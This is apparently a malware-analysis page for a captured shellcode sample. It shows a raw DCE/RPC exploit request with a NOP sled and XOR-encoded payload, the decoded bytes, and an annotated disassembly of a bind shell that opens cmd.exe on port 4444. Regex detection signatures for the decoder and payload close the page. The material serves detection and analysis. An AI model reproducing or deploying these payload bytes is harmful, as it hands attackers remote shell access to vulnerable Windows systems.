file csni:shellcodes:adenau:adenau.bin
size 1704 bytes
hexdump
00000000 05 00 00 03 10 00 00 00 a8 06 00 00 e5 00 00 00 |........š...å...|
00000010 90 06 00 00 01 00 04 00 05 00 06 00 01 00 00 00 |................|
00000020 00 00 00 00 32 24 58 fd cc 45 64 49 b0 70 dd ae |....2$XýÌEdI°pÝ®|
00000030 74 2c 96 d2 60 5e 0d 00 01 00 00 00 00 00 00 00 |t,.Ò`^..........|
00000040 70 5e 0d 00 02 00 00 00 7c 5e 0d 00 00 00 00 00 |p^......|^......|
00000050 10 00 00 00 80 96 f1 f1 2a 4d ce 11 a6 6a 00 20 |......ññ*MÎ.Šj. |
00000060 af 6e 72 f4 0c 00 00 00 4d 41 52 42 01 00 00 00 |¯nrô....MARB....|
00000070 00 00 00 00 0d f0 ad ba 00 00 00 00 a8 f4 0b 00 |.....ðº....šô..|
00000080 20 06 00 00 20 06 00 00 4d 45 4f 57 04 00 00 00 | ... ...MEOW....|
00000090 a2 01 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 |¢.......À......F|
000000a0 38 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 |8.......À......F|
000000b0 00 00 00 00 f0 05 00 00 e8 05 00 00 00 00 00 00 |....ð...è.......|
000000c0 01 10 08 00 cc cc cc cc c8 00 00 00 4d 45 4f 57 |....ÌÌÌÌÈ...MEOW|
000000d0 e8 05 00 00 d8 00 00 00 00 00 00 00 02 00 00 00 |è...Ø...........|
000000e0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000000f0 00 00 00 00 c4 28 cd 00 64 29 cd 00 00 00 00 00 |....Ä(Í.d)Í.....|
00000100 07 00 00 00 b9 01 00 00 00 00 00 00 c0 00 00 00 |....¹.......À...|
00000110 00 00 00 46 ab 01 00 00 00 00 00 00 c0 00 00 00 |...F«.......À...|
00000120 00 00 00 46 a5 01 00 00 00 00 00 00 c0 00 00 00 |...F¥.......À...|
00000130 00 00 00 46 a6 01 00 00 00 00 00 00 c0 00 00 00 |...FŠ.......À...|
00000140 00 00 00 46 a4 01 00 00 00 00 00 00 c0 00 00 00 |...F€.......À...|
00000150 00 00 00 46 ad 01 00 00 00 00 00 00 c0 00 00 00 |...F.......À...|
00000160 00 00 00 46 aa 01 00 00 00 00 00 00 c0 00 00 00 |...Fª.......À...|
00000170 00 00 00 46 07 00 00 00 60 00 00 00 58 00 00 00 |...F....`...X...|
00000180 90 00 00 00 40 00 00 00 20 00 00 00 38 03 00 00 |....@... ...8...|
00000190 30 00 00 00 01 00 00 00 01 10 08 00 cc cc cc cc |0...........ÌÌÌÌ|
000001a0 50 00 00 00 4f b6 88 20 ff ff ff ff 00 00 00 00 |P...O¶. ÿÿÿÿ....|
000001b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
000001f0 00 00 00 00 00 00 00 00 01 10 08 00 cc cc cc cc |............ÌÌÌÌ|
00000200 48 00 00 00 07 00 66 00 06 09 02 00 00 00 00 00 |H.....f.........|
00000210 c0 00 00 00 00 00 00 46 10 00 00 00 00 00 00 00 |À......F........|
00000220 00 00 00 00 01 00 00 00 00 00 00 00 78 19 0c 00 |............x...|
00000230 58 00 00 00 05 00 06 00 01 00 00 00 70 d8 98 93 |X...........pØ..|
00000240 98 4f d2 11 a9 3d be 57 b2 00 00 00 32 00 31 00 |.OÒ.©=ŸW²...2.1.|
00000250 01 10 08 00 cc cc cc cc 80 00 00 00 0d f0 ad ba |....ÌÌÌÌ.....ðº|
00000260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000270 18 43 14 00 00 00 00 00 60 00 00 00 60 00 00 00 |.C......`...`...|
00000280 4d 45 4f 57 04 00 00 00 c0 01 00 00 00 00 00 00 |MEOW....À.......|
00000290 c0 00 00 00 00 00 00 46 3b 03 00 00 00 00 00 00 |À......F;.......|
000002a0 c0 00 00 00 00 00 00 46 00 00 00 00 30 00 00 00 |À......F....0...|
000002b0 01 00 01 00 81 c5 17 03 80 0e e9 4a 99 99 f1 8a |.....Å....éJ..ñ.|
000002c0 50 6f 7a 85 02 00 00 00 00 00 00 00 00 00 00 00 |Poz.............|
000002d0 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 |................|
000002e0 01 10 08 00 cc cc cc cc 30 00 00 00 78 00 6e 00 |....ÌÌÌÌ0...x.n.|
000002f0 00 00 00 00 d8 da 0d 00 00 00 00 00 00 00 00 00 |....ØÚ..........|
00000300 20 2f 0c 00 00 00 00 00 00 00 00 00 03 00 00 00 | /..............|
00000310 00 00 00 00 03 00 00 00 46 00 58 00 00 00 00 00 |........F.X.....|
00000320 01 10 08 00 cc cc cc cc 10 00 00 00 30 00 2e 00 |....ÌÌÌÌ....0...|
00000330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000340 01 10 08 00 cc cc cc cc 68 00 00 00 0e 00 ff ff |....ÌÌÌÌh.....ÿÿ|
00000350 68 8b 0b 00 02 00 00 00 00 00 00 00 00 00 00 00 |h...............|
00000360 86 01 00 00 00 00 00 00 86 01 00 00 5c 00 5c 00 |............\.\.|
00000370 46 00 58 00 4e 00 42 00 46 00 58 00 46 00 58 00 |F.X.N.B.F.X.F.X.|
00000380 4e 00 42 00 46 00 58 00 46 00 58 00 46 00 58 00 |N.B.F.X.F.X.F.X.|
00000390 46 00 58 00 9d 13 00 01 cc e0 fd 7f cc e0 fd 7f |F.X.....Ìàý.Ìàý.|
000003a0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................|
*
00000440 90 90 90 90 90 90 90 eb 19 5e 31 c9 81 e9 89 ff |.......ë.^1É.é.ÿ|
00000450 ff ff 81 36 80 bf 32 94 81 ee fc ff ff ff e2 f2 |ÿÿ.6.¿2..îüÿÿÿâò|
00000460 eb 05 e8 e2 ff ff ff 03 53 06 1f 74 57 75 95 80 |ë.èâÿÿÿ.S..tWu..|
00000470 bf bb 92 7f 89 5a 1a ce b1 de 7c e1 be 32 94 09 |¿»...Z.αÞ|áŸ2..|
00000480 f9 3a 6b b6 d7 9f 4d 85 71 da c6 81 bf 32 1d c6 |ù:k¶×.M.qÚÆ.¿2.Æ|
00000490 b3 5a f8 ec bf 32 fc b3 8d 1c f0 e8 c8 41 a6 df |³Zøì¿2ü³..ðèÈAŠß|
000004a0 eb cd c2 88 36 74 90 7f 89 5a e6 7e 0c 24 7c ad |ëÍÂ.6t...Zæ~.$||
000004b0 be 32 94 09 f9 22 6b b6 d7 4c 4c 62 cc da 8a 81 |Ÿ2..ù"k¶×LLbÌÚ..|
000004c0 bf 32 1d c6 ab cd e2 84 d7 f9 79 7c 84 da 9a 81 |¿2.Æ«Íâ.×ùy|.Ú..|
000004d0 bf 32 1d c6 a7 cd e2 84 d7 eb 9d 75 12 da 6a 80 |¿2.ƧÍâ.×ë.u.Új.|
000004e0 bf 32 1d c6 a3 cd e2 84 d7 96 8e f0 78 da 7a 80 |¿2.Æ£Íâ.×..ðxÚz.|
000004f0 bf 32 1d c6 9f cd e2 84 d7 96 39 ae 56 da 4a 80 |¿2.Æ.Íâ.×.9®VÚJ.|
00000500 bf 32 1d c6 9b cd e2 84 d7 d7 dd 06 f6 da 5a 80 |¿2.Æ.Íâ.××Ý.öÚZ.|
00000510 bf 32 1d c6 97 cd e2 84 d7 d5 ed 46 c6 da 2a 80 |¿2.Æ.Íâ.×ÕíFÆÚ*.|
00000520 bf 32 1d c6 93 01 6b 01 53 a2 95 80 bf 66 fc 81 |¿2.Æ..k.S¢..¿fü.|
00000530 be 32 94 7f e9 2a c4 d0 ef 62 d4 d0 ff 62 6b d6 |Ÿ2..é*ÄÐïbÔÐÿbkÖ|
00000540 a3 b9 4c d7 e8 5a 96 80 ae 6e 1f 4c d5 24 c5 d3 |£¹L×èZ..®n.LÕ$ÅÓ|
00000550 40 64 b4 d7 ec cd c2 a4 e8 63 c7 7f e9 1a 1f 50 |@dŽ×ìÍ€ècÇ.é..P|
00000560 d7 57 ec e5 bf 5a f7 ed db 1c 1d e6 8f b1 78 d4 |×Wìå¿Z÷íÛ..æ.±xÔ|
00000570 32 0e b0 b3 7f 01 5d 03 7e 27 3f 62 42 f4 d0 a4 |2.°³..].~'?bBôЀ|
00000580 af 76 6a c4 9b 0f 1d d4 9b 7a 1d d4 9b 7e 1d d4 |¯vjÄ...Ô.z.Ô.~.Ô|
00000590 9b 62 19 c4 9b 22 c0 d0 ee 63 c5 ea be 63 c5 7f |.b.Ä."ÀÐîcÅêŸcÅ.|
000005a0 c9 02 c5 7f e9 22 1f 4c d5 cd 6b b1 40 64 98 0b |É.Å.é".LÕÍk±@d..|
000005b0 77 65 6b d6 93 cd c2 94 ea 64 f0 21 8f 32 94 80 |wekÖ.ÍÂ.êdð!.2..|
000005c0 3a f2 ec 8c 34 72 98 0b cf 2e 39 0b d7 3a 7f 89 |:òì.4r..Ï.9.×:..|
000005d0 34 72 a0 0b 17 8a 94 80 bf b9 51 de e2 f0 90 80 |4r .....¿¹QÞâð..|
000005e0 ec 67 c2 d7 34 5e b0 98 34 77 a8 0b eb 37 ec 83 |ìgÂ×4^°.4wš.ë7ì.|
000005f0 6a b9 de 98 34 68 b4 83 62 d1 a6 c9 34 06 1f 83 |j¹Þ.4hŽ.bÑŠÉ4...|
00000600 4a 01 6b 7c 8c f2 38 ba 7b 46 93 41 70 3f 97 78 |J.k|.ò8º{F.Ap?.x|
00000610 54 c0 af fc 9b 26 e1 61 34 68 b0 83 62 54 1f 8c |TÀ¯ü.&áa4h°.bT..|
00000620 f4 b9 ce 9c bc ef 1f 84 34 31 51 6b bd 01 54 0b |ô¹Î.Œï..41Qkœ.T.|
00000630 6a 6d ca dd e4 f0 90 80 2f a2 04 00 5c 00 43 00 |jmÊÝäð../¢..\.C.|
00000640 24 00 5c 00 31 00 32 00 33 00 34 00 35 00 36 00 |$.\.1.2.3.4.5.6.|
00000650 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 |1.1.1.1.1.1.1.1.|
00000660 31 00 31 00 31 00 31 00 31 00 31 00 31 00 2e 00 |1.1.1.1.1.1.1...|
00000670 64 00 6f 00 63 00 00 00 01 10 08 00 cc cc cc cc |d.o.c.......ÌÌÌÌ|
00000680 20 00 00 00 30 00 2d 00 00 00 00 00 88 2a 0c 00 | ...0.-......*..|
00000690 02 00 00 00 01 00 00 00 28 8c 0c 00 01 00 00 00 |........(.......|
000006a0 07 00 00 00 00 00 00 00 |........|
000006a8
00000000: 05 00 00 03 10 00 00 00 - a8 06 00 00 e5 00 00 00 ........ ........ 00000010: 90 06 00 00 01 00 04 00 - 05 00 06 00 01 00 00 00 ........ ........ 00000020: 00 00 00 00 32 24 58 fd - cc 45 64 49 b0 70 dd ae ....2.X. .EdI.p.. 00000030: 74 2c 96 d2 60 5e 0d 00 - 01 00 00 00 00 00 00 00 t....... ........ 00000040: 70 5e 0d 00 02 00 00 00 - 7c 5e 0d 00 00 00 00 00 p....... ........ 00000050: 10 00 00 00 80 96 f1 f1 - 2a 4d ce 11 a6 6a 00 20 ........ .M...j.. 00000060: af 6e 72 f4 0c 00 00 00 - 4d 41 52 42 01 00 00 00 .nr..... MARB.... 00000070: 00 00 00 00 0d f0 ad ba - 00 00 00 00 a8 f4 0b 00 ........ ........ 00000080: 20 06 00 00 20 06 00 00 - 4d 45 4f 57 04 00 00 00 ........ MEOW.... 00000090: a2 01 00 00 00 00 00 00 - c0 00 00 00 00 00 00 46 ........ .......F 000000a0: 38 03 00 00 00 00 00 00 - c0 00 00 00 00 00 00 46 8....... .......F 000000b0: 00 00 00 00 f0 05 00 00 - e8 05 00 00 00 00 00 00 ........ ........ 000000c0: 01 10 08 00 cc cc cc cc - c8 00 00 00 4d 45 4f 57 ........ ....MEOW 000000d0: e8 05 00 00 d8 00 00 00 - 00 00 00 00 02 00 00 00 ........ ........ 000000e0: 07 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 000000f0: 00 00 00 00 c4 28 cd 00 - 64 29 cd 00 00 00 00 00 ........ d....... 00000100: 07 00 00 00 b9 01 00 00 - 00 00 00 00 c0 00 00 00 ........ ........ 00000110: 00 00 00 46 ab 01 00 00 - 00 00 00 00 c0 00 00 00 ...F.... ........ 00000120: 00 00 00 46 a5 01 00 00 - 00 00 00 00 c0 00 00 00 ...F.... ........ 00000130: 00 00 00 46 a6 01 00 00 - 00 00 00 00 c0 00 00 00 ...F.... ........ 00000140: 00 00 00 46 a4 01 00 00 - 00 00 00 00 c0 00 00 00 ...F.... ........ 00000150: 00 00 00 46 ad 01 00 00 - 00 00 00 00 c0 00 00 00 ...F.... ........ 00000160: 00 00 00 46 aa 01 00 00 - 00 00 00 00 c0 00 00 00 ...F.... ........ 00000170: 00 00 00 46 07 00 00 00 - 60 00 00 00 58 00 00 00 ...F.... ....X... 00000180: 90 00 00 00 40 00 00 00 - 20 00 00 00 38 03 00 00 ........ ....8... 00000190: 30 00 00 00 01 00 00 00 - 01 10 08 00 cc cc cc cc 0....... ........ 000001a0: 50 00 00 00 4f b6 88 20 - ff ff ff ff 00 00 00 00 P...O... ........ 000001b0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 000001c0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 000001d0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 000001e0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 000001f0: 00 00 00 00 00 00 00 00 - 01 10 08 00 cc cc cc cc ........ ........ 00000200: 48 00 00 00 07 00 66 00 - 06 09 02 00 00 00 00 00 H.....f. ........ 00000210: c0 00 00 00 00 00 00 46 - 10 00 00 00 00 00 00 00 .......F ........ 00000220: 00 00 00 00 01 00 00 00 - 00 00 00 00 78 19 0c 00 ........ ....x... 00000230: 58 00 00 00 05 00 06 00 - 01 00 00 00 70 d8 98 93 X....... ....p... 00000240: 98 4f d2 11 a9 3d be 57 - b2 00 00 00 32 00 31 00 .O.....W ....2.1. 00000250: 01 10 08 00 cc cc cc cc - 80 00 00 00 0d f0 ad ba ........ ........ 00000260: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 00000270: 18 43 14 00 00 00 00 00 - 60 00 00 00 60 00 00 00 .C...... ........ 00000280: 4d 45 4f 57 04 00 00 00 - c0 01 00 00 00 00 00 00 MEOW.... ........ 00000290: c0 00 00 00 00 00 00 46 - 3b 03 00 00 00 00 00 00 .......F ........ 000002a0: c0 00 00 00 00 00 00 46 - 00 00 00 00 30 00 00 00 .......F ....0... 000002b0: 01 00 01 00 81 c5 17 03 - 80 0e e9 4a 99 99 f1 8a ........ ...J.... 000002c0: 50 6f 7a 85 02 00 00 00 - 00 00 00 00 00 00 00 00 Poz..... ........ 000002d0: 00 00 00 00 00 00 00 00 - 00 00 00 00 01 00 00 00 ........ ........ 000002e0: 01 10 08 00 cc cc cc cc - 30 00 00 00 78 00 6e 00 ........ 0...x.n. 000002f0: 00 00 00 00 d8 da 0d 00 - 00 00 00 00 00 00 00 00 ........ ........ 00000300: 20 2f 0c 00 00 00 00 00 - 00 00 00 00 03 00 00 00 ........ ........ 00000310: 00 00 00 00 03 00 00 00 - 46 00 58 00 00 00 00 00 ........ F.X..... 00000320: 01 10 08 00 cc cc cc cc - 10 00 00 00 30 00 2e 00 ........ ....0... 00000330: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 00000340: 01 10 08 00 cc cc cc cc - 68 00 00 00 0e 00 ff ff ........ h....... 00000350: 68 8b 0b 00 02 00 00 00 - 00 00 00 00 00 00 00 00 h....... ........ 00000360: 86 01 00 00 00 00 00 00 - 86 01 00 00 5c 00 5c 00 ........ ........ 00000370: 46 00 58 00 4e 00 42 00 - 46 00 58 00 46 00 58 00 F.X.N.B. F.X.F.X. 00000380: 4e 00 42 00 46 00 58 00 - 46 00 58 00 46 00 58 00 N.B.F.X. F.X.F.X. 00000390: 46 00 58 00 9d 13 00 01 - cc e0 fd 7f cc e0 fd 7f F.X..... ........ 000003a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000003b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000003c0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000003d0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000003e0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000003f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000400: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000410: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000420: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000430: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000440: 90 90 90 90 90 90 90 eb - 19 5e 31 c9 81 e9 89 ff ........ ..1..... 00000450: ff ff 81 36 80 bf 32 94 - 81 ee fc ff ff ff e2 f2 ...6..2. ........ 00000460: eb 05 e8 e2 ff ff ff 83 - ec 34 8b f4 e8 47 01 00 ........ .4...G.. 00000470: 00 89 06 ff 36 68 8e 4e - 0e ec e8 61 01 00 00 89 ....6h.N ...a.... 00000480: 46 08 ff 36 68 ad d9 05 - ce e8 52 01 00 00 89 46 F..6h... ..R....F 00000490: 0c 68 6c 6c 00 00 68 33 - 32 2e 64 68 77 73 32 5f .hll..h3 2.dhws2. 000004a0: 54 ff 56 08 89 46 04 ff - 36 68 72 fe b3 16 e8 2d T.V..F.. 6hr..... 000004b0: 01 00 00 89 46 10 ff 36 - 68 7e d8 e2 73 e8 1e 01 ....F..6 h...s... 000004c0: 00 00 89 46 14 ff 76 04 - 68 cb ed fc 3b e8 0e 01 ...F..v. h....... 000004d0: 00 00 89 46 18 ff 76 04 - 68 d9 09 f5 ad e8 fe 00 ...F..v. h....... 000004e0: 00 00 89 46 1c ff 76 04 - 68 a4 1a 70 c7 e8 ee 00 ...F..v. h..p.... 000004f0: 00 00 89 46 20 ff 76 04 - 68 a4 ad 2e e9 e8 de 00 ...F..v. h....... 00000500: 00 00 89 46 24 ff 76 04 - 68 e5 49 86 49 e8 ce 00 ...F..v. h.I.I... 00000510: 00 00 89 46 28 ff 76 04 - 68 e7 79 c6 79 e8 be 00 ...F..v. h.y.y... 00000520: 00 00 89 46 2c 33 ff 81 - ec 90 01 00 00 54 68 01 ...F.3.. .....Th. 00000530: 01 00 00 ff 56 18 50 50 - 50 50 40 50 40 50 ff 56 ....V.PP PP.P.P.V 00000540: 1c 8b d8 57 57 68 02 00 - 11 5c 8b cc 6a 16 51 53 ...WWh.. ....j.QS 00000550: ff 56 20 57 53 ff 56 24 - 57 51 53 ff 56 28 8b d0 .V.WS.V. WQS.V... 00000560: 68 65 78 65 00 68 63 6d - 64 2e 89 66 30 83 ec 54 hexe.hcm d..f0..T 00000570: 8d 3c 24 33 c0 33 c9 83 - c1 15 ab e2 fd c6 44 24 ...3.3.. ......D. 00000580: 10 44 fe 44 24 3d 89 54 - 24 48 89 54 24 4c 89 54 .D.D...T .H.T.L.T 00000590: 24 50 8d 44 24 10 54 50 - 51 51 51 6a 01 51 51 ff .P.D..TP QQQj.QQ. 000005a0: 76 30 51 ff 56 10 8b cc - 6a ff ff 31 ff 56 0c 8b v0Q.V... j..1.V.. 000005b0: c8 57 ff 56 2c ff 56 14 - 55 56 64 a1 30 00 00 00 .W.V..V. UVd.0... 000005c0: 85 c0 78 0c 8b 40 0c 8b - 70 1c ad 8b 68 08 eb 09 ..x..... p...h... 000005d0: 8b 40 34 8b a8 b8 00 00 - 00 8b c5 5e 5d c2 04 00 ..4..... ........ 000005e0: 53 55 56 57 8b 6c 24 18 - 8b 45 3c 8b 54 05 78 03 SUVW.l.. .E..T.x. 000005f0: d5 8b 4a 18 8b 5a 20 03 - dd e3 32 49 8b 34 8b 03 ..J..Z.. ..2I.4.. 00000600: f5 33 ff fc 33 c0 ac 3a - c4 74 07 c1 cf 0d 03 f8 .3..3... .t...... 00000610: eb f2 3b 7c 24 14 75 e1 - 8b 5a 24 03 dd 66 8b 0c ......u. .Z...f.. 00000620: 4b 8b 5a 1c 03 dd 8b 04 - 8b 03 c5 eb 02 33 c0 8b K.Z..... .....3.. 00000630: d5 5f 5e 5d 5b c2 04 00 - 90 90 90 00 5c 00 43 00 ........ ......C. 00000640: 24 00 5c 00 31 00 32 00 - 33 00 34 00 35 00 36 00 ....1.2. 3.4.5.6. 00000650: 31 00 31 00 31 00 31 00 - 31 00 31 00 31 00 31 00 1.1.1.1. 1.1.1.1. 00000660: 31 00 31 00 31 00 31 00 - 31 00 31 00 31 00 2e 00 1.1.1.1. 1.1.1... 00000670: 64 00 6f 00 63 00 00 00 - 01 10 08 00 cc cc cc cc d.o.c... ........ 00000680: 20 00 00 00 30 00 2d 00 - 00 00 00 00 88 2a 0c 00 ....0... ........ 00000690: 02 00 00 00 01 00 00 00 - 28 8c 0c 00 01 00 00 00 ........ ........ 000006a0: 07 00 00 00 00 00 00 00 - 00 ........ .
00424A38 EB 19 JMP SHORT c4e562de.00424A53 00424A3A 5E POP ESI 00424A3B 31C9 XOR ECX,ECX 00424A3D 81E9 89FFFFFF SUB ECX,-77 00424A43 8136 80BF3294 XOR DWORD PTR DS:[ESI],9432BF80 00424A49 81EE FCFFFFFF SUB ESI,-4 00424A4F ^E2 F2 LOOPD SHORT c4e562de.00424A43 00424A51 EB 05 JMP SHORT c4e562de.00424A58e
00424A51 EB 05 JMP SHORT c4e562de.00424A58 00424A53 E8 E2FFFFFF CALL c4e562de.00424A3A 00424A58 83EC 34 SUB ESP,34 00424A5B 8BF4 MOV ESI,ESP 00424A5D E8 47010000 CALL c4e562de.00424BA9 00424A62 8906 MOV DWORD PTR DS:[ESI],EAX 00424A64 FF36 PUSH DWORD PTR DS:[ESI] 00424A66 68 8E4E0EEC PUSH EC0E4E8E 00424A6B E8 61010000 CALL c4e562de.00424BD1 00424A70 8946 08 MOV DWORD PTR DS:[ESI+8],EAX ; mov LoadLibraryA 00424A73 FF36 PUSH DWORD PTR DS:[ESI] 00424A75 68 ADD905CE PUSH CE05D9AD 00424A7A E8 52010000 CALL c4e562de.00424BD1 00424A7F 8946 0C MOV DWORD PTR DS:[ESI+C],EAX ; mov WaitForSingleObject 00424A82 68 6C6C0000 PUSH 6C6C 00424A87 68 33322E64 PUSH 642E3233 00424A8C 68 7773325F PUSH 5F327377 00424A91 54 PUSH ESP 00424A92 FF56 08 CALL DWORD PTR DS:[ESI+8] 00424A95 8946 04 MOV DWORD PTR DS:[ESI+4],EAX ; WS2_32.#390 00424A98 FF36 PUSH DWORD PTR DS:[ESI] 00424A9A 68 72FEB316 PUSH 16B3FE72 00424A9F E8 2D010000 CALL c4e562de.00424BD1 00424AA4 8946 10 MOV DWORD PTR DS:[ESI+10],EAX ; CreateProcessA 00424AA7 FF36 PUSH DWORD PTR DS:[ESI] 00424AA9 68 7ED8E273 PUSH 73E2D87E 00424AAE E8 1E010000 CALL c4e562de.00424BD1 00424AB3 8946 14 MOV DWORD PTR DS:[ESI+14],EAX ; ExitProcess 00424AB6 FF76 04 PUSH DWORD PTR DS:[ESI+4] 00424AB9 68 CBEDFC3B PUSH 3BFCEDCB 00424ABE E8 0E010000 CALL c4e562de.00424BD1 00424AC3 8946 18 MOV DWORD PTR DS:[ESI+18],EAX ; WSAStartup 00424AC6 FF76 04 PUSH DWORD PTR DS:[ESI+4] 00424AC9 68 D909F5AD PUSH ADF509D9 00424ACE E8 FE000000 CALL c4e562de.00424BD1 00424AD3 8946 1C MOV DWORD PTR DS:[ESI+1C],EAX ; WSASocketA 00424AD6 FF76 04 PUSH DWORD PTR DS:[ESI+4] 00424AD9 68 A41A70C7 PUSH C7701AA4 00424ADE E8 EE000000 CALL c4e562de.00424BD1 00424AE3 8946 20 MOV DWORD PTR DS:[ESI+20],EAX ; mov bind() 00424AE6 FF76 04 PUSH DWORD PTR DS:[ESI+4] 00424AE9 68 A4AD2EE9 PUSH E92EADA4 00424AEE E8 DE000000 CALL c4e562de.00424BD1 00424AF3 8946 24 MOV DWORD PTR DS:[ESI+24],EAX ; mov listen() 00424AF6 FF76 04 PUSH DWORD PTR DS:[ESI+4] 00424AF9 68 E5498649 PUSH 498649E5 00424AFE E8 CE000000 CALL c4e562de.00424BD1 00424B03 8946 28 MOV DWORD PTR DS:[ESI+28],EAX ; mov accept() 00424B06 FF76 04 PUSH DWORD PTR DS:[ESI+4] 00424B09 68 E779C679 PUSH 79C679E7 00424B0E E8 BE000000 CALL c4e562de.00424BD1 00424B13 8946 2C MOV DWORD PTR DS:[ESI+2C],EAX ; mov closesocket() 00424B16 33FF XOR EDI,EDI 00424B18 81EC 90010000 SUB ESP,190 00424B1E 54 PUSH ESP 00424B1F 68 01010000 PUSH 101 00424B24 FF56 18 CALL DWORD PTR DS:[ESI+18] ; call WSAStartup() 00424B27 50 PUSH EAX 00424B28 50 PUSH EAX 00424B29 50 PUSH EAX 00424B2A 50 PUSH EAX 00424B2B 40 INC EAX 00424B2C 50 PUSH EAX 00424B2D 40 INC EAX 00424B2E 50 PUSH EAX 00424B2F FF56 1C CALL DWORD PTR DS:[ESI+1C] ; call WSASocketA 00424B32 8BD8 MOV EBX,EAX 00424B34 57 PUSH EDI 00424B35 57 PUSH EDI 00424B36 68 0200115C PUSH 5C110002 ; 5C11 is the port 00424B3B 8BCC MOV ECX,ESP 00424B3D 6A 16 PUSH 16 00424B3F 51 PUSH ECX 00424B40 53 PUSH EBX 00424B41 FF56 20 CALL DWORD PTR DS:[ESI+20] ; call bind() 00424B44 57 PUSH EDI 00424B45 53 PUSH EBX 00424B46 FF56 24 CALL DWORD PTR DS:[ESI+24] ; call listen() 00424B49 57 PUSH EDI 00424B4A 51 PUSH ECX 00424B4B 53 PUSH EBX 00424B4C FF56 28 CALL DWORD PTR DS:[ESI+28] ; call accept() 00424B4F 8BD0 MOV EDX,EAX 00424B51 68 65786500 PUSH 657865 00424B56 68 636D642E PUSH 2E646D63 00424B5B 8966 30 MOV DWORD PTR DS:[ESI+30],ESP 00424B5E 83EC 54 SUB ESP,54 00424B61 8D3C24 LEA EDI,DWORD PTR SS:[ESP] 00424B64 33C0 XOR EAX,EAX
"\\xEB\\x19\\x5E\\x31\\xC9\\x81\\xE9(....)\\x81\\x36(....)\\x81\\xEE\\xFC\\xFF\\xFF\\xFF" "\\xE2\\xF2\\xEB\\x05\\xE8\\xE2\\xFF\\xFF\\xFF(.*)$",
"\\x83\\xEC\\x34\\x8B\\xF4\\xE8\\x47\\x01\\x00\\x00\\x89\\x06\\xFF\\x36\\x68\\x8E\\x4E\\x0E" "\\xEC\\xE8\\x61\\x01\\x00\\x00\\x89\\x46\\x08\\xFF\\x36\\x68\\xAD\\xD9\\x05\\xCE\\xE8\\x52" "\\x01\\x00\\x00\\x89\\x46\\x0C\\x68\\x6C\\x6C\\x00\\x00\\x68\\x33\\x32\\x2E\\x64\\x68\\x77" "\\x73\\x32\\x5F\\x54\\xFF\\x56\\x08\\x89\\x46\\x04\\xFF\\x36\\x68\\x72\\xFE\\xB3\\x16\\xE8" "\\x2D\\x01\\x00\\x00\\x89\\x46\\x10\\xFF\\x36\\x68\\x7E\\xD8\\xE2\\x73\\xE8\\x1E\\x01\\x00" "\\x00\\x89\\x46\\x14\\xFF\\x76\\x04\\x68\\xCB\\xED\\xFC\\x3B\\xE8\\x0E\\x01\\x00\\x00\\x89" "\\x46\\x18\\xFF\\x76\\x04\\x68\\xD9\\x09\\xF5\\xAD\\xE8\\xFE\\x00\\x00\\x00\\x89\\x46\\x1C" "\\xFF\\x76\\x04\\x68\\xA4\\x1A\\x70\\xC7\\xE8\\xEE\\x00\\x00\\x00\\x89\\x46\\x20\\xFF\\x76" "\\x04\\x68\\xA4\\xAD\\x2E\\xE9\\xE8\\xDE\\x00\\x00\\x00\\x89\\x46\\x24\\xFF\\x76\\x04\\x68" "\\xE5\\x49\\x86\\x49\\xE8\\xCE\\x00\\x00\\x00\\x89\\x46\\x28\\xFF\\x76\\x04\\x68\\xE7\\x79" "\\xC6\\x79\\xE8\\xBE\\x00\\x00\\x00\\x89\\x46\\x2C\\x33\\xFF\\x81\\xEC\\x90\\x01\\x00\\x00" "\\x54\\x68\\x01\\x01\\x00\\x00\\xFF\\x56\\x18\\x50\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\xFF" "\\x56\\x1C\\x8B\\xD8\\x57\\x57\\x68\\x02\\x00(..)\\x8B\\xCC\\x6A\\x16\\x51\\x53\\xFF\\x56" "\\x20\\x57\\x53\\xFF\\x56\\x24\\x57\\x51\\x53\\xFF\\x56\\x28\\x8B\\xD0\\x68\\x65\\x78\\x65" "\\x00\\x68\\x63\\x6D\\x64\\x2E\\x89\\x66\\x30\\x83\\xEC\\x54\\x8D\\x3C\\x24\\x33\\xC0"
